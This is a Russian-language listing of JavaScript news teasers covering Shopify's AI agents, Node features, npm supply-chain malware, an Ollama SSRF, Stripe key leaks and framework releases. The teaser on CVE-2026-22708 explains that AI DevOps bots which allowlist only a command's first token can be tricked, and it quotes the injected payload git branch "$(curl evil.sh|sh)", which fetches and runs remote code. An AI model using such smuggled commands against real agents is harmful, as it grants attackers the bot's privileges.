GyaanSetu JavaScript

Экосистема JavaScript и TypeScript.

100 articlesDeep, practical knowledge

ИИ-агенты «Pi» и «Tardis» позволили Shopify отказаться от React Native спустя шесть лет

Shopify разработала двух внутренних ИИ-агентов — Pi для сопоставления функций и Tardis для отладки в реальном времени — чтобы автоматизировать процесс переписывания кода. Это позволило компании отказаться от стека React Native, использовавшегося шесть лет, при этом ускорив запуск приложения на 2 секунды, уменьшив его размер на 109 МБ и сократив количество сбоев примерно в десять раз.

JavaScript · 2 мин чтения

Promise.withResolvers в Node 22 сокращает циклы инструментов Claude вдвое

Заменяя громоздкий паттерн `new Promise` одним вызовом `Promise.withResolvers()`, разработчики могут передавать функции resolve/reject в любую часть системы, избавляясь от забытых resolve, предупреждений о двойном reject и глубокой вложенности — что особенно важно в serverless-средах Lambda.

JavaScript · 4 мин чтения

TLS-фингерпринтинг вынуждает скраперы на Playwright расходовать лишние облачные мощности, что ведет к росту затрат

Серверы создают хеш-отпечаток JA3/JA4 на основе необработанного TLS ClientHello; любое несоответствие заявленному User-Agent или настройкам HTTP/2 позволяет идентифицировать запрос как автоматизированный. Единственный надежный способ решения — добиться того, чтобы каждый уровень запроса транслировал единый образ браузера.

JavaScript · 4 мин чтения

Pocket-35B от VIDRAFT работает на любом процессоре ноутбука и достигла 1 миллиона скачиваний

Веса Pocket-35B в формате GGUF загружаются напрямую в llama.cpp или Ollama, что позволяет командам без бюджета на GPU запускать модель с 35 миллиардами параметров на обычном ноутбуке — при условии соблюдения скромных требований к оперативной памяти.

JavaScript · 3 мин чтения

Почему ваш кастомный HTML5-плеер вылетает при трансляции: 4 скрытые ловушки

При трансляции (casting) управление воспроизведением передается прошивке телевизора, поэтому токены должны действовать дольше, чем сессия, заголовки CORS должны включать origin телевизора, а URL потока не может быть blob-объектом. В руководстве показано, как перейти на URL манифеста и проверить соединение.

JavaScript · 3 мин чтения

Как текстовый lockfile в Bun снижает риски в цепочке поставок благодаря сканированию политик в CI

Новый lockfile по умолчанию в Bun v1.2 — это текстовый bun.lock, заменяющий непрозрачный bun.lockb. Это изменение позволяет рецензентам видеть точные изменения версий, запускать проверки политик в CI и отслеживать вредоносные вставки с помощью стандартных инструментов git.

JavaScript · 1 мин чтения

Вредоносное ПО JSCeal крадет OAuth-токены Chrome и обходит Google MFA у криптотрейдеров

Полезная нагрузка JSCeal, работающая только в оперативной памяти, извлекает куки, сохраненные пароли и OAuth-токены из браузеров Chromium, а затем воспроизводит сессии для обхода двухфакторной аутентификации Google, позволяя злоумышленникам похищать средства с Binance, Bybit, Ledger и других платформ.

JavaScript · 2 мин чтения

13 поддельных Coinbase Wallet SDK наводнили реестр npm всего за 48 секунд

Пакеты, опубликованные в период с 04:54:59 по 04:55:48 UTC 7 сентября 2026 года, имитировали @coinbase/wallet-sdk под именами вроде cb-wallet-http и использовали версию 0.0.1-security, наглядно показывая, как быстро вредоносный код может проникнуть в проекты.

JavaScript · 2 мин чтения

ClickFix перехватывает криптодепозиты напрямую из браузеров через Tampermonkey

Cisco Talos обнаружила ClickFix — схему крипто-скимминга, которая обманом заставляет пользователей устанавливать скрипт Tampermonkey. Скрипт в реальном времени подменяет адреса депозитов, похищая средства, при этом транзакция выглядит легитимной.

JavaScript · 2 мин чтения

Лишь 2 из 13 диапазонов Semver работают одинаково в npm, Cargo, Composer и pip

Тестирование 13 выражений диапазонов на 19 номерах версий выявило всего 17 совпадений, большинство из которых — отказы. Символы caret, tilde и dot-x интерпретируются каждым менеджером по-разному, что приводит к неожиданным несовместимостям.

JavaScript · 2 мин чтения

Загрузчик моделей Ollama позволяет неавторизованным злоумышленникам красть облачные метаданные через SSRF

Уязвимость SSRF сохраняется в Ollama 0.33.2, так как загрузчик тензорных моделей использует отдельный HTTP-клиент, который обходит защиту от перенаправлений, добавленную для CVE-2026-5530. Это позволяет злоумышленникам перенаправлять процесс загрузки на любой доступный адрес.

JavaScript · 3 мин чтения

Уязвимость DevOps-ботов на базе ИИ: белые списки префиксов позволяют выполнять произвольный код

CVE-2026-22708 показывает, что агенты, проверяющие только первый токен команды, могут быть обмануты вредоносной нагрузкой, скрытой в аргументах (например, git branch "$(curl evil.sh|sh)"), что предоставляет злоумышленникам те же привилегии, что и боту автоматизации.

JavaScript · 4 мин чтения

Anthropic снижает стоимость Claude Fable 5.1 на 45% для повторяющихся циклов агентов

Скидка 45% применяется при многократном использовании одного и того же системного промпта и схемы инструментов, что делает Claude Fable 5.1 особенно привлекательным для автономных рецензентов кода, ботов для сортировки тикетов и других повторяющихся агентских конвейеров.

JavaScript · 3 мин чтения

WebFPGA обеспечивает выполнение TinyML-вывода за 4 мс при 30 мВт — данные не покидают браузер

WebFPGA использует WebUSB API для программирования FPGA Lattice iCE40-UP5K из JavaScript, обеспечивая выполнение TinyML-вывода менее чем за 10 мс при потреблении всего нескольких десятков милливатт и сохранении всех данных на устройстве.

JavaScript · 2 мин чтения

Утечка ключей Stripe привела к мошенническим списаниям и краже данных клиентов у 669 вендоров

Скомпрометированные ключи позволяют злоумышленникам создавать списания, запрашивать счета и собирать персональные данные, что грозит чарджбэками, штрафами и репутационным ущербом. Срочные меры включают блокировку dot-файлов, ротацию всех ключей и перенос секретов в защищенное хранилище.

JavaScript · 4 мин чтения

Vapor Mode в Vue 3.6 отказывается от Virtual DOM и повышает производительность игр

Предстоящий Vapor Mode в Vue 3.6 компилирует однофайловые компоненты в прямые вызовы DOM, исключая этап сравнения (diffing) Virtual DOM. В бенчмарках игр, требующих десятки перерисовок в секунду, это изменение сокращает время рендеринга и уменьшает размер бандлов, хотя в интерфейсах с низкой частотой обновления прирост будет незначительным.

JavaScript · 4 мин чтения

Anthropic потратила $165 тыс. на токены Claude, чтобы переписать Bun на Rust за 11 дней

Инженеры Anthropic использовали 64 параллельных агента Claude Fable 5, чтобы переписать кодовую базу Bun на Rust за 11 дней. Расходы на токены составили $165 тыс., но реальная стоимость, скорее всего, окажется выше, если учесть затраты на вычисления после слияния кода и аудит безопасности.

JavaScript · 3 мин чтения

Claude переводит четыре агентских инструмента в статус GA, устраняя необходимость в beta-заголовках для корпоративных клиентов

С отменой заголовков запросов, доступных только для бета-версии, корпоративные клиенты наконец смогут преодолеть юридические и технические барьеры в области безопасности. Новый режим пакетных действий для инструмента computer-use также обещает снижение задержки и расхода токенов, хотя экономия еще требует подтверждения.

JavaScript · 3 мин чтения

TanStack Table v9 сокращает размер бандла до ~5 КБ благодаря выбору функций

Новая бета-версия позволяет импортировать только необходимые возможности сетки: можно полностью исключить код сортировки, уменьшить объем загрузки примерно до 5 КБ и избежать нагрузки на основной поток, которая ранее снижала показатели INP.

JavaScript · 2 мин чтения

Meteor 3.5 снижает нагрузку на CPU на 9% и удваивает пропускную способность благодаря переходу на uWebSockets.js

В Meteor 3.5 представлен подключаемый транспорт DDP, который можно заменить на uWebSockets.js с помощью переменной окружения DDP_TRANSPORT=uws, что обеспечивает увеличение пропускной способности до 1,6 раза, снижение нагрузки на CPU на 9%, потребления RAM на 11% и сокращение пауз GC на 26% для приложений с интенсивным использованием RPC.

JavaScript · 2 мин чтения

Освоение продвинутого серверного кэширования в Next.js

Освоение продвинутого серверного кэширования в Next.js. Масштабирование приложения Next.js требует большего, чем просто выбор между SSR и SSG. По мере роста объема данных вам потребуется продвинутое кэширование, чтобы сократить…

JavaScript · 3 мин чтения